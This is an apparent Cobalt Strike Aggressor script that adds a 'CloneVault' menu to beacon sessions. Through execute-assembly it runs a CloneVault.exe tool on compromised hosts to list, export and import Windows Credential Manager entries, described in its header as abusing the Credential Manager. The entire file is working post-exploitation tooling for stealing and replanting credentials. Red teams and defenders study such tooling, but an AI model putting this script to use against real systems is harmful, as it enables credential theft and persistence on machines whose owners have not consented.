#################################################

#   Abuse Credential Manager - CloneVault
#################################################
menu "CloneVault" {

item "List Credentials"{
	local('$bid');
		foreach $bid ($1){
			listcreds($bid);
		}
	}
			
item "Export Credentials"{
	local('$bid');
		foreach $bid ($1){
			exportcred($bid);
		}
	}
			
item "Export All Credentials"{
	local('$bid');
		foreach $bid ($1){
			exportallcreds($bid);
		}
	}
			
item "Import Credential"{
	local('$bid');
		foreach $bid ($1){
			importcred($bid);
		}
	}
	
item "Import Credential File"{
	local('$bid');
		foreach $bid ($1){
			importcredfile($bid);
		}
	}
	
}	
#################################################

#  Function Abuse Credential Manager - CloneVault

#################################################	
	
sub listcreds{
bexecute_assembly($1, script_resource("/exe/CloneVault.exe"), "list");
}

sub exportcred{
prompt_text("Enter Application Name: ", "", lambda({
bexecute_assembly($bids, script_resource("/exe/CloneVault.exe"), "$1");
}, $bids => $1));
}

sub exportallcreds{
bexecute_assembly($1, script_resource("/exe/CloneVault.exe"), "exportAll");
}

sub importcred{
prompt_text("Enter JSON String: ", "", lambda({
bexecute_assembly($bids, script_resource("/exe/CloneVault.exe"), "$1");
}, $bids => $1));
}

sub importcredfile{
prompt_text("Path To JSON File: ", "", lambda({
bexecute_assembly($bids, script_resource("/exe/CloneVault.exe"), "$1");
}, $bids => $1));
}